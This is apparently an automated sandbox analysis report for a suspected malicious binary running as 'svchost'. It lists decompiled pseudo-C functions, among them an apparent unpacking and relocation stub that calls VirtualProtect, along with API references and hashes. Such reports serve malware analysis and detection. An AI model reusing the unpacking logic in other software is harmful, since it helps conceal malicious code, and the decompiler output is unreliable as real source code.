				char _v867;
				char _v891;
				char _v915;
				char _v935;
				char _v943;
				char _v983;
				char _v999;
				int _t58;
				unsigned int _t64;
				signed int _t76;
				void* _t86;
				long _t94;
				void* _t97;
				void* _t98;
				unsigned short _t100;
				unsigned short _t104;
				void* _t112;
				long* _t114;
				long _t115;
				void* _t116;
				long* _t117;
				void* _t118;
				intOrPtr* _t119;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				void* _t125;
				intOrPtr* _t129;
				signed int _t133;
				unsigned int _t146;
				long _t147;
				void* _t149;
				long* _t150;
				intOrPtr _t151;
				long _t154;
				void* _t156;
				long _t159;
				void* _t160;
				void* _t161;
				long _t165;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t169;
				long _t171;
				DWORD* _t174;
				void* _t175;
				void* _t176;
				long _t178;
				long _t180;
				void* _t183;
				intOrPtr _t185;

				_t168 = __esi;
				_t149 = __edx;
				_pop(_t112);
				E0050AF13(__eflags, _t112 + 0x368, __eax);
				asm("popad");
				_t169 =  *_t168;
				_t1 =  &_v999; // 0xe300000
				_t159 = _t183 +  *_t1;
				_t114 = _t159;
				if( *_t159 != 0) {
					_t160 = _t159 +  *_t114;
					_t115 =  &(_t114[1]);
					__eflags = _t115;
					L11:
					__eflags =  *_t115;
					if( *_t115 != 0) {
						 *_t115 =  *_t115 + _t149;
						_t167 = _t160 +  *((intOrPtr*)(_t115 + 4));
						__eflags = _t167;
						goto L13;
					}
				} else {
					__edi = __edi + 4;
					__ecx = 0;
					L13:
					_t16 =  &_v811; // 0x74
					_t17 =  &_v815; // 0x713a1074
					_t18 =  &_v943; // 0x40100000
					 *((intOrPtr*)( *_t18 + 0x5a9))( *_t17,  *_t16, 1, _t167); // executed
					_pop(_t125);
					_pop(_t149);
					1 = _t115;
					_t160 = _t149;
					__eflags = 1;
					if(1 != 0) {
						_t115 = _t125 + 8;
						goto L11;
					}
				}
				_t19 =  &_v943; // 0x40100000, executed
				_t58 = VirtualFree( *_t19, 0, 0x8000);
				_t21 =  &_v935; // 0x50a83f
				_t170 = _t21;
				_t22 =  &(_t170[2]); // 0x11e00
				_t23 =  &(_t170[4]); // 0x50a84f
				_t150 = _t23;
				_t171 =  *_t21;
				_t159 = _t171;
				__eflags =  *_t22;
				if( *_t22 != 0) {
					goto L16;
					do {
						do {
							L16:
							_t98 =  *_t159;
							_t159 = _t159 + 1;
							__eflags = _t98 - 0xe8 - 1;
						} while (_t98 - 0xe8 > 1);
						_t100 =  *_t159;
						__eflags = _t150[0];
						if(_t150[0] == 0) {
							_t122 =  *((intOrPtr*)(_t159 + 4));
							asm("rol eax, 0x10");
							_t104 = _t100;
						} else {
							goto L18;
						}
						L21:
						 *_t159 = _t104 - _t159 + _t171;
						_t159 = _t159 + 5;
						_t58 = _t122 - 0xe8;
						asm("loop 0xffffffc8");
						goto L22;
						L18:
						__eflags =  *_t159 -  *_t150;
					} while ( *_t159 !=  *_t150);
					_t122 =  *((intOrPtr*)(_t159 + 4));
					asm("rol eax, 0x10");
					_t104 = _t100 >> 8;
					goto L21;
				}
				L22:
				E0050AE69(_t58);
				_t30 =  &_v915; // 0x50a853
				_t129 = _t30;
				_t31 = _t129 + 8; // 0x0
				__eflags =  *_t31;
				if( *_t31 != 0) {
					_t32 = _t129 + 0x10; // 0x0
					_t178 = _t150 -  *_t32;
					__eflags = _t178;
					if(_t178 != 0) {
						 *(_t129 + 0x10) = _t178;
						_t34 =  &_v867; // 0x50a883
						_t180 =  *_t34;
						_t35 = _t180 - 4; // 0x489f5fc
						_t119 = _t35;
						__eflags =  *_t129 - 1;
						if( *_t129 == 1) {
							_t38 = _t129 + 8; // 0x0
							_t165 = _t180 +  *_t38;
							__eflags = _t165;
							_t39 = _t129 + 0x10; // 0x0
							_t146 =  *_t39;
						} else {
							_t36 = _t129 + 8; // 0x0
							_t165 = _t150 +  *_t36;
							_t37 = _t129 + 0x10; // 0x0
							_t146 =  *_t37;
						}
						while(1) {
							_t165 = _t165 + 1;
							_t93 = 0;
							__eflags = 0;
							if(0 == 0) {
								break;
							}
							__eflags = 0 - 0xef;
							if(0 > 0xef) {
								_t97 =  *_t165;
								_t165 = _t165 + 2;
								_t93 = _t97;
								__eflags = 0;
								if(0 == 0) {
									_t93 =  *_t165;
									_t165 = _t165 + 4;
								}
							}
							_t119 = _t119 + _t93;
							 *_t119 =  *_t119 + _t146;
						}
						_t120 = 0;
						_t159 = _t180;
						_t94 =  *_t165;
						__eflags = _t94;
						if(_t94 != 0) {
							while(1) {
								asm("lodsd");
								_t94 = _t94;
								__eflags = _t94;
								if(_t94 == 0) {
									break;
								}
								_t120 = _t120 + _t94;
								 *((intOrPtr*)(_t159 + _t120)) =  *((intOrPtr*)(_t159 + _t120)) + _t146;
							}
							_t121 = 0;
							_t147 = _t146 >> 0x10;
							__eflags = _t147;
							while(1) {
								asm("lodsd");
								_t94 = _t94;
								__eflags = _t94;
								if(_t94 == 0) {
									goto L38;
								}
								_t121 = _t121 + _t94;
								 *((intOrPtr*)(_t159 + _t121)) =  *((intOrPtr*)(_t159 + _t121)) + _t147;
							}
						}
					}
				}
				L38:
				_t45 =  &_v983; // 0x50a80f
				_t151 =  *_t45;
				_t46 =  &_v891; // 0x50a86b
				_t169 = _t46;
				__eflags =  *_t169 - 1;
				if( *_t169 != 1) {
					L41:
					_t116 = _t183;
					_t114 = _t116 - 0x21;
					__eflags =  *_t114;
					if( *_t114 != 0) {
						_t117 =  &(_t114[0]);
						_t51 =  &_v983; // 0x50a80f
						_t174 = _t51;
						_t154 =  *_t174;
						_push(_t174);
						_push(0);
						_t52 =  &(_t117[1]); // 0x200
						_t53 =  &(_t117[2]); // 0x163e000
						VirtualProtect( *_t53 + _t154,  *_t52,  *_t117, _t174);
						_t118 = _t154;
						_t169 = _t117;
						_t114 = _t118 + 0xc;
						asm("loop 0xffffffe3");
					}
					__eflags = 0;
					if(0 == 0) {
						asm("popad");
						asm("popfd");
						_push(_t183);
						_push(0xffffffff);
						_push(0x49d6f8);
						_push(E00472CF4);
						_push( *[fs:0x0]);
						 *[fs:0x0] = _t185;
						_push(_t114);
						_push(_t169);
						_push(_t159);
						_v24 = _t185 - 0x58;
						_t64 = GetVersion();
						 *0x4e1804 = 0;
						_t133 = _t64 & 0x000000ff;
						 *0x4e1800 = _t133;
						 *0x4e17fc = _t133 << 8;
						 *0x4e17f8 = _t64 >> 0x10;
						if(E00474E11(_t133 << 8, 1) == 0) {
							E0046FE89(0x1c);
						}
						if(E00474BCE() == 0) {
							E0046FE89(0x10);
						}
						_v8 = 0;
						E00474A12();
						 *0x4e2fe4 = GetCommandLineA();
						 *0x4e1770 = E004748E0();
						E00474693();
						E004745DA();
						E00473896();
						_v96.dwFlags = 0;
						GetStartupInfoA( &_v96);
						_v104 = E00474582();
						_t191 = _v96.dwFlags & 0x00000001;
						if((_v96.dwFlags & 0x00000001) == 0) {
							_t76 = 0xa;
						} else {
							_t76 = _v96.wShowWindow & 0x0000ffff;
						}
						_v100 = E00480D6E(GetModuleHandleA(0), 0, _v104, _t76);
						E004738C3(_t78);
						_v108 =  *((intOrPtr*)( *_v24));
						return E0047440A(_t159, _t191,  *((intOrPtr*)( *_v24)), _v24);
					} else {
						asm("popad");
						asm("popfd");
						return 1;
					}
				} else {
					_t47 = _t169 + 4; // 0x1569c00
					_t156 = _t151 +  *_t47;
					_t86 = _v819(4, _t169, _t156, _t169);
					_t161 = _t156;
					_t175 = 0x100;
					__eflags = _t86 - 1;
					if(_t86 != 1) {
						return _v807(0);
					} else {
						_t176 = _t175 + 8;
						memcpy(_t161, _t176, 8);
						_t185 = _t185 + 0xc;
						_t169 = _t176 - 0xc;
						_t159 = _t176 + 0x10 - 8;
						__eflags = _t159;
						_v819(_t159, 0x100,  *((intOrPtr*)(_t169 - 4)), _t169);
						goto L41;
					}
				}
			}
































































    0x0050ac53
    0x0050ac53
    0x0050ac53
    0x0050ac5d
    0x0050ac62
    0x0050ac63
    0x0050ac67
    0x0050ac67
    0x0050ac6d
    0x0050ac72
    0x0050ac83
    0x0050ac85
    0x0050ac85
    0x0050ac88
    0x0050ac88
    0x0050ac8b
    0x0050ac8d
    0x0050ac91
    0x0050ac91
    0x00000000
    0x0050ac91
    0x0050ac74
    0x0050ac74
    0x0050ac77
    0x0050ac94
    0x0050ac98
    0x0050ac9e
    0x0050aca8
    0x0050acb3
    0x0050acb5
    0x0050acb6
    0x0050acb7
    0x0050acb8
    0x0050acb9
    0x0050acbc
    0x0050acbe
    0x00000000
    0x0050acbe
    0x0050acbc
    0x0050acca
    0x0050acd0
    0x0050acd6
    0x0050acd6
    0x0050acdc
    0x0050acdf
    0x0050acdf
    0x0050ace2
    0x0050ace4
    0x0050ace6
    0x0050ace9
    0x00000000
    0x0050aceb
    0x0050aceb
    0x0050aceb
    0x0050aceb
    0x0050aced
    0x0050acf0
    0x0050acf0
    0x0050acf4
    0x0050acf6
    0x0050acfa
    0x0050ad10
    0x0050ad15
    0x0050ad18
    0x00000000
    0x00000000
    0x00000000
    0x0050ad1a
    0x0050ad1e
    0x0050ad20
    0x0050ad26
    0x0050ad28
    0x00000000
    0x0050acfc
    0x0050acfe
    0x0050acfe
    0x0050ad02
    0x0050ad09
    0x0050ad0c
    0x00000000
    0x0050ad0c
    0x0050ad2a
    0x0050ad2a
    0x0050ad2f
    0x0050ad2f
    0x0050ad35
    0x0050ad38
    0x0050ad3b
    0x0050ad43
    0x0050ad43
    0x0050ad43
    0x0050ad46
    0x0050ad48
    0x0050ad4b
    0x0050ad51
    0x0050ad53
    0x0050ad53
    0x0050ad58
    0x0050ad5b
    0x0050ad69
    0x0050ad69
    0x0050ad69
    0x0050ad6c
    0x0050ad6c
    0x0050ad5d
    0x0050ad5f
    0x0050ad5f
    0x0050ad62
    0x0050ad62
    0x0050ad62
    0x0050ad6f
    0x0050ad73
    0x0050ad74
    0x0050ad74
    0x0050ad76
    0x00000000
    0x00000000
    0x0050ad78
    0x0050ad7a
    0x0050ad87
    0x0050ad8a
    0x0050ad8d
    0x0050ad8d
    0x0050ad8f
    0x0050ad91
    0x0050ad93
    0x0050ad93
    0x0050ad8f
    0x0050ad7c
    0x0050ad7e
    0x0050ad7e
    0x0050ad98
    0x0050ad9a
    0x0050ad9c
    0x0050ad9e
    0x0050ada1
    0x0050ada3
    0x0050ada3
    0x0050ada4
    0x0050ada4
    0x0050ada6
    0x00000000
    0x00000000
    0x0050ada8
    0x0050adaa
    0x0050adaa
    0x0050adb0
    0x0050adb2
    0x0050adb2
    0x0050adb5
    0x0050adb5
    0x0050adb6
    0x0050adb6
    0x0050adb8
    0x00000000
    0x00000000
    0x0050adba
    0x0050adbc
    0x0050adbc
    0x0050adb5
    0x0050ada1
    0x0050ad46
    0x0050adc2
    0x0050adc2
    0x0050adc8
    0x0050adca
    0x0050adca
    0x0050add2
    0x0050add4
    0x0050ae15
    0x0050ae16
    0x0050ae17
    0x0050ae21
    0x0050ae24
    0x0050ae26
    0x0050ae27
    0x0050ae27
    0x0050ae2d
    0x0050ae2f
    0x0050ae30
    0x0050ae36
    0x0050ae39
    0x0050ae3f
    0x0050ae46
    0x0050ae48
    0x0050ae49
    0x0050ae4c
    0x0050ae4c
    0x0050ae53
    0x0050ae56
    0x0050ae62
    0x0050ae63
    0x0046fd5c
    0x0046fd5f
    0x0046fd61
    0x0046fd66
    0x0046fd71
    0x0046fd72
    0x0046fd7c
    0x0046fd7d
    0x0046fd7e
    0x0046fd7f
    0x0046fd82
    0x0046fd8c
    0x0046fd94
    0x0046fd9a
    0x0046fda5
    0x0046fdae
    0x0046fdbd
    0x0046fdc1
    0x0046fdc6
    0x0046fdce
    0x0046fdd2
    0x0046fdd7
    0x0046fdda
    0x0046fddd
    0x0046fde8
    0x0046fdf2
    0x0046fdf7
    0x0046fdfc
    0x0046fe01
    0x0046fe06
    0x0046fe0d
    0x0046fe18
    0x0046fe1b
    0x0046fe1f
    0x0046fe29
    0x0046fe21
    0x0046fe21
    0x0046fe21
    0x0046fe3c
    0x0046fe40
    0x0046fe4c
    0x0046fe58
    0x0050ae58
    0x0050ae58
    0x0050ae59
    0x0050ae5f
    0x0050ae5f
    0x0050add6
    0x0050add6
    0x0050add6
    0x0050ade4
    0x0050adea
    0x0050adeb
    0x0050adec
    0x0050adef
    0x0050afba
    0x0050adf5
    0x0050adf5
    0x0050adfd
    0x0050adfd
    0x0050adff
    0x0050ae02
    0x0050ae02
    0x0050ae0f
    0x00000000
    0x0050ae0f
    0x0050adef

    APIs
    • VirtualFree.KERNELBASE(40100000,00000000,00008000,0050AC53,00000000), ref: 0050ACD0
    • VirtualProtect.KERNELBASE(0163E000,00000200,0050ABC6,0050A80F,?,0050ABC6,00000000,0050A80F), ref: 0050AE3F
    Memory Dump Source
    • Source File: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 0321e99b05351837c07c5a3f9419d667d8787c5608cbbedf329a53786f235210
    • Instruction ID: c7b8536cab105c3d62b6f180d80e01ca0b83acf16b7f1fe13d287a1efe5aa3e0
    • Opcode Fuzzy Hash: 0321e99b05351837c07c5a3f9419d667d8787c5608cbbedf329a53786f235210
    • Instruction Fuzzy Hash: 3F61F8336043119FEB268E18CC847EDBB75FF95310F2945A4D4859B2C1D771AE82CB51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004839C2 Relevance: 3.1, APIs: 2, Instructions: 107fileCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E004839C2(void* __ecx, CHAR* _a4, signed int _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES _v16;
				char _v276;
				void* __esi;
				void* __ebp;
				signed int _t32;
				signed int _t34;
				long _t35;
				void* _t36;
				intOrPtr _t40;
				void* _t42;
				signed int _t45;
				long _t49;
				signed int _t57;
				long _t58;
				void* _t63;
				intOrPtr _t64;

				_t63 = __ecx;
				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				 *(__ecx + 4) =  *(__ecx + 4) | 0xffffffff;
				_t44 = __ecx + 0xc;
				_t57 = _a8 & 0xffff7fff;
				E0048324D(__ecx + 0xc, __ecx);
				_push(_a4);
				_push( &_v276); // executed
				E00483CEE(); // executed
				E004833FF(_t44,  &_v276);
				_t49 = 0;
				_t32 = _t57 & 0x00000003;
				if(_t32 == 0) {
					_t49 = 0x80000000;
				} else {
					_t42 = _t32 - 1;
					if(_t42 == 0) {
						_t49 = 0x40000000;
					} else {
						if(_t42 == 1) {
							_t49 = 0xc0000000;
						}
					}
				}
				_t34 = _t57 & 0x00000070;
				_t45 = 1;
				if(_t34 == 0 || _t34 == 0x10) {
					L15:
					_t35 = 0;
					goto L16;
				} else {
					if(_t34 == 0x20) {
						_t35 = _t45;
						L16:
						_v16.lpSecurityDescriptor = _v16.lpSecurityDescriptor & 0x00000000;
						_v16.nLength = 0xc;
						_v16.bInheritHandle =  !_t57 >> 0x00000007 & _t45;
						if((_t57 & 0x00001000) == 0) {
							_t58 = 3;
						} else {
							asm("sbb edi, edi");
							_t58 = ( ~(_t57 & 0x00002000) & 0x00000002) + 2;
						}
						_t36 = CreateFileA(_a4, _t49, _t35,  &_v16, _t58, 0x80, 0); // executed
						if(_t36 != 0xffffffff) {
							 *(_t63 + 4) = _t36;
							 *(_t63 + 8) = _t45;
							return _t45;
						} else {
							_t64 = _a12;
							if(_t64 != 0) {
								 *((intOrPtr*)(_t64 + 0xc)) = GetLastError();
								_t40 = E0048877E(_t39);
								_t21 = _t64 + 0x10; // 0x10
								 *((intOrPtr*)(_t64 + 8)) = _t40;
								E004833FF(_t21, _a4);
							}
							return 0;
						}
					}
					if(_t34 == 0x30) {
						_push(2);
						L12:
						_pop(_t35);
						goto L16;
					}
					if(_t34 != 0x40) {
						goto L15;
					}
					_push(3);
					goto L12;
				}
			}



















    0x004839cd
    0x004839d3
    0x004839d7
    0x004839db
    0x004839de
    0x004839e6
    0x004839eb
    0x004839f4
    0x004839f5
    0x00483a03
    0x00483a0a
    0x00483a0f
    0x00483a11
    0x00483a27
    0x00483a13
    0x00483a13
    0x00483a14
    0x00483a20
    0x00483a16
    0x00483a17
    0x00483a19
    0x00483a19
    0x00483a17
    0x00483a14
    0x00483a30
    0x00483a33
    0x00483a34
    0x00483a57
    0x00483a57
    0x00000000
    0x00483a3b
    0x00483a3e
    0x00483a53
    0x00483a59
    0x00483a59
    0x00483a66
    0x00483a73
    0x00483a76
    0x00483a8b
    0x00483a78
    0x00483a80
    0x00483a86
    0x00483a86
    0x00483a9d
    0x00483aa6
    0x00483ad0
    0x00483ad3
    0x00000000
    0x00483aa8
    0x00483aa8
    0x00483aad
    0x00483ab6
    0x00483ab9
    0x00483ac1
    0x00483ac4
    0x00483ac7
    0x00483ac7
    0x00000000
    0x00483acc
    0x00483aa6
    0x00483a43
    0x00483a4f
    0x00483a4c
    0x00483a4c
    0x00000000
    0x00483a4c
    0x00483a48
    0x00000000
    0x00000000
    0x00483a4a
    0x00000000
    0x00483a4a

    APIs
      • Part of subcall function 00483CEE: __EH_prolog.LIBCMT ref: 00483CF3
      • Part of subcall function 00483CEE: GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?), ref: 00483D11
      • Part of subcall function 00483CEE: lstrcpyn.KERNEL32(?,?,00000104), ref: 00483D20
    • CreateFileA.KERNELBASE(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,?), ref: 00483A9D
    • GetLastError.KERNEL32 ref: 00483AAF
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpyn
    • String ID:
    • API String ID: 1034715445-0
    • Opcode ID: e09936e4ed554b855c3766f0d16a19887f6df69778bc150ed784a248a6f3376a
    • Instruction ID: 90d31c71ac07ec01886b4748eb17e1da0538fda55a1a5f92b851c5f8087d021c
    • Opcode Fuzzy Hash: e09936e4ed554b855c3766f0d16a19887f6df69778bc150ed784a248a6f3376a
    • Instruction Fuzzy Hash: 29310A32A00205ABDB28BE65CC45B6F7795AB80B15F208D2FE496D72C0C678DB458718
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B7F0 Relevance: 3.0, APIs: 2, Instructions: 37memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E0040B7F0(void* __ecx, void* _a4) {
				void* _t8;
				void* _t10;
				char _t11;
				intOrPtr* _t17;
				signed int _t19;
				void* _t21;
				intOrPtr _t22;

				_t21 = _a4;
				if(_t21 == 0) {
					return _t8;
				} else {
					_t22 =  *((intOrPtr*)(__ecx + 4));
					if(_t21 < _t22 + 0x64) {
						L4:
						_t10 =  *0x4c938c; // 0xae0000
						if(_t10 == 0) {
							_t10 = GetProcessHeap();
							 *0x4c938c = _t10;
						}
						_t11 = RtlFreeHeap(_t10, 0, _t21); // executed
						return _t11;
					}
					_t19 = _t22 + 0xc064;
					if(_t21 >= _t19) {
						goto L4;
					}
					asm("cdq");
					 *((char*)((_t21 - _t22 - 0x64 + (_t19 & 0x000001ff) >> 9) + _t22 + 4)) = 0;
					_t17 =  *((intOrPtr*)(__ecx + 4));
					 *_t17 =  *_t17 - 1;
					return _t17;
				}
			}










    0x0040b7f2
    0x0040b7f8
    0x0040b850
    0x0040b7fa
    0x0040b7fa
    0x0040b802
    0x0040b830
    0x0040b830
    0x0040b837
    0x0040b839
    0x0040b83f
    0x0040b83f
    0x0040b848
    0x00000000
    0x0040b848
    0x0040b804
    0x0040b80c
    0x00000000
    0x00000000
    0x0040b816
    0x0040b822
    0x0040b827
    0x0040b82b
    0x0040b82d
    0x0040b82d

    APIs
    • GetProcessHeap.KERNEL32(00000000,?,0040B788,?,?,?,?,0040B606,00000000,?,?,?,0040AC22,?,000007DB), ref: 0040B839
    • RtlFreeHeap.NTDLL(00AE0000,00000000,?,00000000,?,0040B788,?,?,?,?,0040B606,00000000,?,?,?,0040AC22), ref: 0040B848
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Heap$FreeProcess
    • String ID:
    • API String ID: 3859560861-0
    • Opcode ID: 10fb91eb9a2f86244f231c03722d7d67a812bc2f9eefe05091d941b5eb209d58
    • Instruction ID: 76ceab559b4649bf2cb0c9a6734bf3dffa2804919c9e01fc0aa929cb8f7d74a6
    • Opcode Fuzzy Hash: 10fb91eb9a2f86244f231c03722d7d67a812bc2f9eefe05091d941b5eb209d58
    • Instruction Fuzzy Hash: FAF062372002419BC7109B29D908B867BAAEBE1B15F19C47BD4449B2A4D771E801C7EC
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048D4A3 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0048D4A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed short _t13;
				void* _t16;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t29;

				_t13 = SetErrorMode(0); // executed
				SetErrorMode(_t13 | 0x00008001); // executed
				_t16 = E0048C6BF();
				_t29 = _a4;
				 *((intOrPtr*)(_t16 + 8)) = _t29;
				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
				_t18 =  *((intOrPtr*)(E0048C6BF() + 4));
				_t31 = _t18;
				if(_t18 != 0) {
					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
					 *((intOrPtr*)(_t18 + 0x74)) = _a16;
					E0048D506(_t18, _t31);
				}
				if( *((char*)(E0048C6BF() + 0x14)) == 0) {
					E00487FCD();
				}
				_t20 = 1;
				return _t20;
			}








    0x0048d4ac
    0x0048d4b3
    0x0048d4b5
    0x0048d4ba
    0x0048d4be
    0x0048d4c1
    0x0048d4c9
    0x0048d4cc
    0x0048d4ce
    0x0048d4d4
    0x0048d4d7
    0x0048d4de
    0x0048d4e5
    0x0048d4ea
    0x0048d4ea
    0x0048d4f9
    0x0048d4fb
    0x0048d4fb
    0x0048d502
    0x0048d503

    APIs
    • SetErrorMode.KERNELBASE(00000000,00000000,0048927B,00000000,00000000,00000000,00000000,?,00000000,?,00480D83,00000000,00000000,00000000,00000000,0046FE3C), ref: 0048D4AC
    • SetErrorMode.KERNELBASE(00000000,?,00000000,?,00480D83,00000000,00000000,00000000,00000000,0046FE3C,00000000), ref: 0048D4B3
      • Part of subcall function 0048D506: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0048D537
      • Part of subcall function 0048D506: lstrcpy.KERNEL32(?,.HLP), ref: 0048D5D8
      • Part of subcall function 0048D506: lstrcat.KERNEL32(?,.INI), ref: 0048D605
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
    • String ID:
    • API String ID: 3389432936-0
    • Opcode ID: c588f002ca401c758721d2f9aeb8aa99f4f8a130664e07be84c8bb813b420aaf
    • Instruction ID: 71707f7a55a04aacf7147b9fcc41e7edc759d07429313fe6ae328c6312da06cc
    • Opcode Fuzzy Hash: c588f002ca401c758721d2f9aeb8aa99f4f8a130664e07be84c8bb813b420aaf
    • Instruction Fuzzy Hash: 66F037B49182109FC714FF25D445A0D7BA5AF44724F0588AFF5849B3A2DB78D840CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00474E11 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E00474E11(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x4e1c88 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E00474CC9(_t12, _t15);
					 *0x4e1c8c = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E0047925C();
							goto L5;
						}
					} else {
						_push(0x3f8);
						_t10 = E00478715();
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x4e1c88);
							goto L7;
						}
					}
				}
			}








    0x00474e11
    0x00474e22
    0x00474e28
    0x00474e2a
    0x00474e2f
    0x00474e67
    0x00474e69
    0x00474e31
    0x00474e31
